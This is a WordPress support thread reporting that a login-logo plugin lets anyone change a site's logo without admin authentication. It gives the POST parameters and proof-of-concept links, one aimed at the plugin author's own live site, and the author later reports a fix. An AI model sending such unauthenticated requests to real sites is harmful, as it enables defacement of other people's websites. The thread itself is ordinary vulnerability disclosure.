Title: Security Issue
Last modified: May 17, 2017

---

# Security Issue

 *  Resolved [po1838660997](https://wordpress.org/support/users/po1838660997/)
 * (@po1838660997)
 * [9 years ago](https://wordpress.org/support/topic/security-issue-75/)
 * This plugin does not check an admin is logged in before updating the database
   with the logo you want to use.
 * This means you can make a POST request to any website that uses this plugin with
   the following parameters, and the logo will be changed:
 * >  wpclpl_save=1
   >  wpclpl_logo_url=http://example.com/bad-logo.png
 * You can test this with the following URL (change EXAMPLE.COM to your own domain):
   
   [http://getposted.io/post?action=http://EXAMPLE.COM&wpclpl_save=1&wpclpl_logo_url=https://i.giphy.com/JhqJUTyFPubQs.gif&wpclpl_additional_text=hacked](http://getposted.io/post?action=http://EXAMPLE.COM&wpclpl_save=1&wpclpl_logo_url=https://i.giphy.com/JhqJUTyFPubQs.gif&wpclpl_additional_text=hacked)

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Plugin Author [larsactionhero](https://wordpress.org/support/users/larsactionhero/)
 * (@larsactionhero)
 * [9 years ago](https://wordpress.org/support/topic/security-issue-75/#post-9177783)
 * nice hint, dude. thanks. btw, posting issues in public isn’t that cool.
 *  Thread Starter [po1838660997](https://wordpress.org/support/users/po1838660997/)
 * (@po1838660997)
 * [9 years ago](https://wordpress.org/support/topic/security-issue-75/#post-9178506)
 * This plugin is still broken:
 * [http://getposted.io/post?action=http://wp.larsactionhero.com/wp-admin/admin-ajax.php&wpclpl_save=1&wpclpl_logo_url=http://i.imgur.com/Xz3ppju.gif&wpclpl_additional_text=You%20have%20an%20old%20plugin%20version%20but%201.4.1%20is%20still%20broken](http://getposted.io/post?action=http://wp.larsactionhero.com/wp-admin/admin-ajax.php&wpclpl_save=1&wpclpl_logo_url=http://i.imgur.com/Xz3ppju.gif&wpclpl_additional_text=You%20have%20an%20old%20plugin%20version%20but%201.4.1%20is%20still%20broken)
 *  Plugin Author [larsactionhero](https://wordpress.org/support/users/larsactionhero/)
 * (@larsactionhero)
 * [9 years ago](https://wordpress.org/support/topic/security-issue-75/#post-9216229)
 * Issue is fixed.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Security Issue’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/wp-custom-login-page-logo_e1c5b3.
   svg)
 * [WP Custom Admin Login Page Logo](https://wordpress.org/plugins/wp-custom-login-page-logo/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wp-custom-login-page-logo/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wp-custom-login-page-logo/)
 * [Active Topics](https://wordpress.org/support/plugin/wp-custom-login-page-logo/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wp-custom-login-page-logo/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wp-custom-login-page-logo/reviews/)

 * 3 replies
 * 2 participants
 * Last reply from: [larsactionhero](https://wordpress.org/support/users/larsactionhero/)
 * Last activity: [9 years ago](https://wordpress.org/support/topic/security-issue-75/#post-9216229)
 * Status: resolved